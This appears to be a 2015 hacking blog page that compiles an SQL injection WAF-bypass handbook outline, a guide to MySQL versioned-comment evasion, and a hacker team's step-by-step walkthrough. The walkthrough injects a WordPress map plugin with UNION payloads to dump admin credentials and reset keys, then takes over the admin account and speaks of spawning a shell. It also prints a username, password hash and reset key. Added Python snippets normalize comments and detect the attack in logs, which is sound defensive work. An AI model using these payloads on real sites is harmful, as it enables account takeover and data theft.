Wednesday, May 6, 2015

[New Book] SQL Injection Bypassing HandBook [details+Free]

Waf Bypass Hand Book



Content writers :-

Chapter I

  • SQL Injection: What is it?
  • SQL Injection: An In-depth Explanation
  • Why is it possible to pass SQL queries directly to a database that is hidden behind a firewall and any other security mechanism?
  • Is my database at risk to SQL Injection?
  • What is the impact of SQL Injection?
  • Example of a SQL Injection Attack

Web Application Firewalls

  • Detecting A WAF
  • Prompt Message
  • Dotdefender
  • Observing HTTP Response

Chapter II

Advanced evasion techniques for defeating SQL injection Input validation mechanisms
Web applications are becoming more and more technically complex. Web applications, their

  • Whitespace
  • Null Bytes
  • SQL Comments
  • URL Encoding
  • Changing Cases
  • Encode to Hex Forbidden
  • Replacing keywords technique
  • WAF Bypassing – using characters
  • HTTP Parameter Pollution (HPP)
  • CRLF WAF Bypass technique
  • Buffer Overflow bypassing

Chapter III

Let's see the matter in an orderly fashion from the beginning

  • See if the site is vulnerable or not
  • Get Column Number
  • Bypassing union select
  • Get Version
  • Group & Concat
  • Bypass with Information_schema.tables
  • Requested Bypassing

Chapter IV

Other issues related to the subject
  • Null Parameter
  • FIND VULNERABLE COLUMNS
  • Count(*)
  • unhex()
  • Get database



  • Source ::: HF

[Quick Guide] C-Style comments (WAF bypassing queries explanation)

Many people use cheat sheets to bypass the Web Application Firewall (WAF) without knowing why they write /*!union*/ and not a plain union.

So here is a quick explanation:
These "things" (/*!12345query*/) are called C-style comments. MySQL parses and executes the code placed inside such a comment.




Some examples and explanations:
PHP Code:

/*!12345union*/ bla bla bla injected query... 

When we execute that, the MySQL server parses our query and executes the commented part only if the MySQL version is at least 1.23.45 (12345 is the number we wrote, just without the dots).

Let's try again so you understand better:

PHP Code:
/*!50000union*/ bla bla bla injected query... 

It will execute only if the version is at least 5.00.00 (again, this is the number we wrote: 50000). In most cases the query will execute, because most MySQL versions are higher than 5.00.00, like 5.20.35 etc.
So what is that?
PHP Code:
/*!union*/ 
That says "if the version is at least 0, execute the query."

Let's see what you learned.
Quick quiz:
John tries to bypass the WAF. He tried:


PHP Code:

/*!65432union*/ 

No 403 error appeared, but there was a MySQL error... why?

Because our version is not at least 6.54.32.
In fact, there is no MySQL version 6.54.32, dumbass.
So far, the highest is 5.6 (56000 \ 5.60.00).

References
http://dev.mysql.com/doc/refman/5.1/en/comments.html


Source :: HF
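
For a filter to judge such input it has to read the comment the way the server does. The following is an added example, not part of the original post: it expands /*!NNNNN ... */ bodies for an assumed server version before keyword matching. The function names, the keyword list and the five-digit version form are assumptions of this example.

```python
import re

# /*!NNNNN body */ : MySQL runs body when the server version is at least
# NNNNN, and always when no number is given. Five-digit form assumed.
_VERSIONED = re.compile(r"/\*!(\d{5})?(.*?)\*/", re.S)
_PLAIN = re.compile(r"/\*(?!!).*?\*/", re.S)
# Illustrative keyword list, not a complete rule set.
_KEYWORDS = re.compile(r"\b(union|select|information_schema)\b", re.I)


def version_code(version):
    """'5.6.23' -> 50623, the number format used inside /*!NNNNN ... */."""
    major, minor, release = (int(part) for part in version.split("."))
    return major * 10000 + minor * 100 + release


def as_mysql_sees(sql, server_version):
    """Rewrite sql the way a MySQL server of server_version would read it."""
    current = version_code(server_version)

    def expand(match):
        required, body = match.group(1), match.group(2)
        if required is None or current >= int(required):
            return " " + body + " "   # the comment body is executed
        return " "                     # treated as an ordinary comment

    sql = _VERSIONED.sub(expand, sql)
    return _PLAIN.sub(" ", sql)       # ordinary comments act as whitespace


def naive_hits(value):
    """Keywords found by matching the raw parameter value."""
    return sorted({word.lower() for word in _KEYWORDS.findall(value)})


def normalized_hits(value, server_version):
    """Keywords found after expanding versioned comments first."""
    return naive_hits(as_mysql_sees(value, server_version))
```

On the quiz input, normalization for a 5.6.23 server drops the union entirely, which is why John saw a MySQL error rather than a working query.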

A new way to inject sites that use the WordPress script

This thread comes to you by ☆¸.•*☆ :: Gaza Hacker Team [ GHT ] and [ GHI ] :: ☆*•.¸☆

Today I'll show you how to inject a WordPress site and get into the admin panel in seconds.

Let's say we have this vulnerable site:

PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1 
and let's say we extracted the column number and the admin data [user and password] by SQLi


PHP Code:

www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 Union Select 1,(select(@) from (select (@:=0x00),(select (@) from (wp_userswhere (@) in (@:=concat(@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 --  

admin login : michelsenweb
admin password : $P$BPXdeAk4qo6ndqQWUJfuRkMOCqi.bJ0

Now, this password is difficult to crack.

OK, now I will show you an easy way to log in to the admin panel.

First we go to the admin panel and press "Lost your password?"



PHP Code:

www.site.com/wp-login.php 

Now we enter the admin user we found by injection: michelsenweb.


like this

Now, we don't have the admin's mail to receive a link to create a new password or to get the activation key.

OK, see what I will do!

Now we will extract the user_activation_key by injection, which we will use to create a new password.


PHP Code:

www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM wp_users










Now we have the user_activation_key for this admin user: michelsenweb

michelsenweb:ADpMtuhLWYbPSubvKwgx

Now we will use this query to create a new password:

PHP Code:

www.site.com/wp-login.php?action=rp&key=user_activation_key&login=user_login 

replace : user_activation_key by ADpMtuhLWYbPSubvKwgx
replace : user_login by michelsenweb

like this

PHP Code:
www.site.com/wp-login.php?action=rp&key=ADpMtuhLWYbPSubvKwgx&login=michelsenweb 

Now we get this page to create a new password. After we make the new password, press Reset password.

OK, let's try to log in to the admin panel with our new password.

Aha, we are now in the admin panel and now we can spawn a shell.

Hope you learned something.

Author :: 
Gaza Hacker Team
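
From the defender's side, the request sequence in this walkthrough stands out in an access log. The following added example (not from the original thread) flags a non-numeric marker value on the plugin page and any password-reset request to wp-login.php that follows from the same client. The log lines are constructed, and it assumes a legitimate marker is always a positive integer.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample in combined-log style; IPs are documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [06/May/2015:10:00:01 +0000] "GET /wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1 HTTP/1.1" 200 5120
203.0.113.9 - - [06/May/2015:10:02:11 +0000] "GET /wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 5301
198.51.100.7 - - [06/May/2015:10:03:40 +0000] "GET /wp-login.php?action=rp&key=EXAMPLEKEY&login=alice HTTP/1.1" 200 2100
203.0.113.9 - - [06/May/2015:10:04:02 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
203.0.113.9 - - [06/May/2015:10:05:30 +0000] "GET /wp-login.php?action=rp&key=EXAMPLEKEY&login=admin HTTP/1.1" 200 2100
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
RESET_ACTIONS = ("lostpassword", "rp", "resetpass")


def find_reset_chains(log_text):
    """Return (time, ip, reason, detail) tuples in log order."""
    suspects = {}   # ip -> first non-numeric marker value seen from it
    findings = []
    for raw in log_text.splitlines():
        match = LINE.match(raw)
        if not match:
            continue  # not a request line in the expected format
        ip, when, _method, target, _status = match.groups()
        url = urlsplit(target)
        query = parse_qs(url.query, keep_blank_values=True)  # URL-decodes values
        if url.path.endswith("/leaflet-fullscreen.php"):
            for value in query.get("marker", []):
                if not re.fullmatch(r"\d+", value):
                    suspects.setdefault(ip, value)
                    findings.append((when, ip, "non-numeric marker", value))
        elif url.path.endswith("/wp-login.php") and ip in suspects:
            action = query.get("action", [""])[0]
            if action in RESET_ACTIONS:
                findings.append((when, ip, "reset after injection attempt", action))
    return findings


if __name__ == "__main__":
    for finding in find_reset_chains(SAMPLE_LOG):
        print(finding)
```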

Tuesday, May 5, 2015

Beginners Guide to Building Mobile Web Apps Infinite Skills

In this Beginners Guide to Building Mobile Web Apps, expert authors Chris 
Minnick and Eva Holland will teach you how to create mobile web apps that will
be able to run on multiple mobile device operating systems. This course is
designed for the absolute beginner, meaning no web development experience is 
required.

You will start by learning about the three types of mobile apps, then jump into 
learning how to design an app.